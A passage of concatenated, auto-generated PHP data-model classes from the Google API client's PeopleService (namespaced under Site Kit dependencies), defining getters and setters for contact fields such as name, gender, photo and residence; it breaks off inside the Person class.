http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Residence extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $current; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param bool */ public function setCurrent($current) { $this->current = $current; } /** * @return bool */ public function getCurrent() { return $this->current; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Residence::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Residence'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Gender extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $addressMeAs; /** * @var string */ public $formattedValue; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param string */ public function setAddressMeAs($addressMeAs) { $this->addressMeAs = $addressMeAs; } /** * @return string */ public function getAddressMeAs() { return $this->addressMeAs; } /** * @param string */ public function setFormattedValue($formattedValue) { $this->formattedValue = $formattedValue; } /** * @return string */ public function getFormattedValue() { return $this->formattedValue; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Gender::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Gender'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class GroupClientData extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $key; /** * @var string */ public $value; /** * @param string */ public function setKey($key) { $this->key = $key; } /** * @return string */ public function getKey() { return $this->key; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\GroupClientData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_GroupClientData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class CopyOtherContactToMyContactsGroupRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sources'; /** * @var string */ public $copyMask; /** * @var string */ public $readMask; /** * @var string[] */ public $sources; /** * @param string */ public function setCopyMask($copyMask) { $this->copyMask = $copyMask; } /** * @return string */ public function getCopyMask() { return $this->copyMask; } /** * @param string */ public function setReadMask($readMask) { $this->readMask = $readMask; } /** * @return string */ public function getReadMask() { return $this->readMask; } /** * @param string[] */ public function setSources($sources) { $this->sources = $sources; } /** * @return string[] */ public function getSources() { return $this->sources; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\CopyOtherContactToMyContactsGroupRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_CopyOtherContactToMyContactsGroupRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Tagline extends \Google\Site_Kit_Dependencies\Google\Model { protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Tagline::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Tagline'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class BatchGetContactGroupsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'responses'; protected $responsesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroupResponse::class; protected $responsesDataType = 'array'; /** * @param ContactGroupResponse[] */ public function setResponses($responses) { $this->responses = $responses; } /** * @return ContactGroupResponse[] */ public function getResponses() { return $this->responses; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchGetContactGroupsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_BatchGetContactGroupsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Date extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $day; /** * @var int */ public $month; /** * @var int */ public $year; /** * @param int */ public function setDay($day) { $this->day = $day; } /** * @return int */ public function getDay() { return $this->day; } /** * @param int */ public function setMonth($month) { $this->month = $month; } /** * @return int */ public function getMonth() { return $this->month; } /** * @param int */ public function setYear($year) { $this->year = $year; } /** * @return int */ public function getYear() { return $this->year; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Date'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class RelationshipStatus extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedValue; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param string */ public function setFormattedValue($formattedValue) { $this->formattedValue = $formattedValue; } /** * @return string */ public function getFormattedValue() { return $this->formattedValue; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\RelationshipStatus::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_RelationshipStatus'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class SearchDirectoryPeopleResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'people'; /** * @var string */ public $nextPageToken; protected $peopleType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $peopleDataType = 'array'; /** * @var int */ public $totalSize; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Person[] */ public function setPeople($people) { $this->people = $people; } /** * @return Person[] */ public function getPeople() { return $this->people; } /** * @param int */ public function setTotalSize($totalSize) { $this->totalSize = $totalSize; } /** * @return int */ public function getTotalSize() { return $this->totalSize; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchDirectoryPeopleResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_SearchDirectoryPeopleResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class BatchDeleteContactsRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'resourceNames'; /** * @var string[] */ public $resourceNames; /** * @param string[] */ public function setResourceNames($resourceNames) { $this->resourceNames = $resourceNames; } /** * @return string[] */ public function getResourceNames() { return $this->resourceNames; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchDeleteContactsRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_BatchDeleteContactsRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class MiscKeyword extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\MiscKeyword::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_MiscKeyword'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class AgeRangeType extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $ageRange; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @param string */ public function setAgeRange($ageRange) { $this->ageRange = $ageRange; } /** * @return string */ public function getAgeRange() { return $this->ageRange; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\AgeRangeType::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_AgeRangeType'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Biography extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $contentType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param string */ public function setContentType($contentType) { $this->contentType = $contentType; } /** * @return string */ public function getContentType() { return $this->contentType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Biography::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Biography'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Photo extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $default; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $url; /** * @param bool */ public function setDefault($default) { $this->default = $default; } /** * @return bool */ public function getDefault() { return $this->default; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Photo::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Photo'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class RelationshipInterest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedValue; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param string */ public function setFormattedValue($formattedValue) { $this->formattedValue = $formattedValue; } /** * @return string */ public function getFormattedValue() { return $this->formattedValue; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\RelationshipInterest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_RelationshipInterest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class BatchCreateContactsRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sources'; protected $contactsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactToCreate::class; protected $contactsDataType = 'array'; /** * @var string */ public $readMask; /** * @var string[] */ public $sources; /** * @param ContactToCreate[] */ public function setContacts($contacts) { $this->contacts = $contacts; } /** * @return ContactToCreate[] */ public function getContacts() { return $this->contacts; } /** * @param string */ public function setReadMask($readMask) { $this->readMask = $readMask; } /** * @return string */ public function getReadMask() { return $this->readMask; } /** * @param string[] */ public function setSources($sources) { $this->sources = $sources; } /** * @return string[] */ public function getSources() { return $this->sources; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchCreateContactsRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_BatchCreateContactsRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class FieldMetadata extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $primary; protected $sourceType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Source::class; protected $sourceDataType = ''; /** * @var bool */ public $sourcePrimary; /** * @var bool */ public $verified; /** * @param bool */ public function setPrimary($primary) { $this->primary = $primary; } /** * @return bool */ public function getPrimary() { return $this->primary; } /** * @param Source */ public function setSource(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Source $source) { $this->source = $source; } /** * @return Source */ public function getSource() { return $this->source; } /** * @param bool */ public function setSourcePrimary($sourcePrimary) { $this->sourcePrimary = $sourcePrimary; } /** * @return bool */ public function getSourcePrimary() { return $this->sourcePrimary; } /** * @param bool */ public function setVerified($verified) { $this->verified = $verified; } /** * @return bool */ public function getVerified() { return $this->verified; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_FieldMetadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ProfileMetadata extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userTypes'; /** * @var string */ public $objectType; /** * @var string[] */ public $userTypes; /** * @param string */ public function setObjectType($objectType) { $this->objectType = $objectType; } /** * @return string */ public function getObjectType() { return $this->objectType; } /** * @param string[] */ public function setUserTypes($userTypes) { $this->userTypes = $userTypes; } /** * @return string[] */ public function getUserTypes() { return $this->userTypes; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ProfileMetadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ProfileMetadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Name extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $displayName; /** * @var string */ public $displayNameLastFirst; /** * @var string */ public $familyName; /** * @var string */ public $givenName; /** * @var string */ public $honorificPrefix; /** * @var string */ public $honorificSuffix; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $middleName; /** * @var string */ public $phoneticFamilyName; /** * @var string */ public $phoneticFullName; /** * @var string */ public $phoneticGivenName; /** * @var string */ public $phoneticHonorificPrefix; /** * @var string */ public $phoneticHonorificSuffix; /** * @var string */ public $phoneticMiddleName; /** * @var string */ public $unstructuredName; /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setDisplayNameLastFirst($displayNameLastFirst) { $this->displayNameLastFirst = $displayNameLastFirst; } /** * @return string */ public function getDisplayNameLastFirst() { return $this->displayNameLastFirst; } /** * @param string */ public function setFamilyName($familyName) { $this->familyName = $familyName; } /** * @return string */ public function getFamilyName() { return $this->familyName; } /** * @param string */ public function setGivenName($givenName) { $this->givenName = $givenName; } /** * @return string */ public function getGivenName() { return $this->givenName; } /** * @param string */ public function setHonorificPrefix($honorificPrefix) { $this->honorificPrefix = $honorificPrefix; } /** * @return string */ public function getHonorificPrefix() { return $this->honorificPrefix; } /** * @param string */ public function setHonorificSuffix($honorificSuffix) { $this->honorificSuffix = $honorificSuffix; } /** * @return string */ public function getHonorificSuffix() { return $this->honorificSuffix; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setMiddleName($middleName) { $this->middleName = $middleName; } /** * @return string */ public function getMiddleName() { return $this->middleName; } /** * @param string */ public function setPhoneticFamilyName($phoneticFamilyName) { $this->phoneticFamilyName = $phoneticFamilyName; } /** * @return string */ public function getPhoneticFamilyName() { return $this->phoneticFamilyName; } /** * @param string */ public function setPhoneticFullName($phoneticFullName) { $this->phoneticFullName = $phoneticFullName; } /** * @return string */ public function getPhoneticFullName() { return $this->phoneticFullName; } /** * @param string */ public function setPhoneticGivenName($phoneticGivenName) { $this->phoneticGivenName = $phoneticGivenName; } /** * @return string */ public function getPhoneticGivenName() { return $this->phoneticGivenName; } /** * @param string */ public function setPhoneticHonorificPrefix($phoneticHonorificPrefix) { $this->phoneticHonorificPrefix = $phoneticHonorificPrefix; } /** * @return string */ public function getPhoneticHonorificPrefix() { return $this->phoneticHonorificPrefix; } /** * @param string */ public function setPhoneticHonorificSuffix($phoneticHonorificSuffix) { $this->phoneticHonorificSuffix = $phoneticHonorificSuffix; } /** * @return string */ public function getPhoneticHonorificSuffix() { return $this->phoneticHonorificSuffix; } /** * @param string */ public function setPhoneticMiddleName($phoneticMiddleName) { $this->phoneticMiddleName = $phoneticMiddleName; } /** * @return string */ public function getPhoneticMiddleName() { return $this->phoneticMiddleName; } /** * @param string */ public function setUnstructuredName($unstructuredName) { $this->unstructuredName = $unstructuredName; } /** * @return string */ public function getUnstructuredName() { return $this->unstructuredName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Name::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Name'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Person extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userDefined'; protected $addressesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Address::class; protected $addressesDataType = 'array'; /** * @var string */ public $ageRange; protected $ageRangesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\AgeRangeType::class; protected $ageRangesDataType = 'array'; protected $biographiesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Biography::class; protected $biographiesDataType = 'array'; protected $birthdaysType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Birthday::class; protected $birthdaysDataType = 'array'; protected $braggingRightsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\BraggingRights::class; protected $braggingRightsDataType = 'array'; protected $calendarUrlsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\CalendarUrl::class; protected $calendarUrlsDataType = 'array'; protected $clientDataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ClientData::class; protected $clientDataDataType = 'array'; protected $coverPhotosType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\CoverPhoto::class; protected $coverPhotosDataType = 'array'; protected $emailAddressesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\EmailAddress::class; protected $emailAddressesDataType = 'array'; /** * @var string */ public $etag; protected $eventsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Event::class; protected $eventsDataType = 'array'; protected $externalIdsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ExternalId::class; protected $externalIdsDataType = 'array'; protected $fileAsesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FileAs::class; protected $fileAsesDataType = 'array'; protected $gendersType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Gender::class; protected $gendersDataType = 'array'; protected $imClientsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ImClient::class; protected $imClientsDataType = 'array'; protected $interestsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Interest::class; protected $interestsDataType = 'array'; protected $localesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Locale::class; protected $localesDataType = 'array'; protected $locationsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Location::class; protected $locationsDataType = 'array'; protected $membershipsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Membership::class; protected $membershipsDataType = 'array'; protected 